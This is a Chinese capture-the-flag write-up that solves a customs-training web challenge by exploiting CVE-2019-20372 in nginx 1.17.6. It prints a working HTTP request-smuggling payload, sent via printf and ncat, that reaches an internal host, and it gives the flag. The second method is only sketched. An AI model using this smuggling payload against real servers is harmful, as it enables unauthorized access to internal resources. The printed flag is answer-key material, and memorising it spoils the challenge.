蜀道山-海关题目平台

题目描述

这是一个海关警察训练平台，你的任务是判断图片展示的东西是否能进入我国境内，但是全部判断成功后的成功页面好像丢失了…… flag在内网的 http://infernityhost/flag.htm

方法一

注意到全部回答正确后的页面是直接跳转到了/error页面。我们可以直接主动访问。

题目直接跳转到了50x.html。没啥可以利用的地方了，看一下服务器版本。

发现中间件刚好是 nginx 1.17.6 CVE-2019-20372-Nginx error_page 请求走私

nginx 1.17.6找到相关版本漏洞：CVE-2019-20372，结合题目名字，确信是一个http请求走私。给了 host和flag位置，直接打payload

printf "GET /error HTTP/1.1\r\nHost: localhost\r\nContent-Length: 56\r\n\r\nGET /flag.html HTTP/1.1\r\nHost: infernityhost\r\n\r\n" | ncat ip port    //ip  port要自己改

就拿到flag:

LZSDS{I_sMugGled_THe_fl4g__whEn_she_cOunTed_TO_thREe33}

方法二

利用bp抓包方式看提示是不是内网http://infernityhost/flag.htm根据漏洞那边我们尝试一下

应为他说flag在flag.html根据前面漏洞的提示如下面的

根据他们修改Host和get传参flag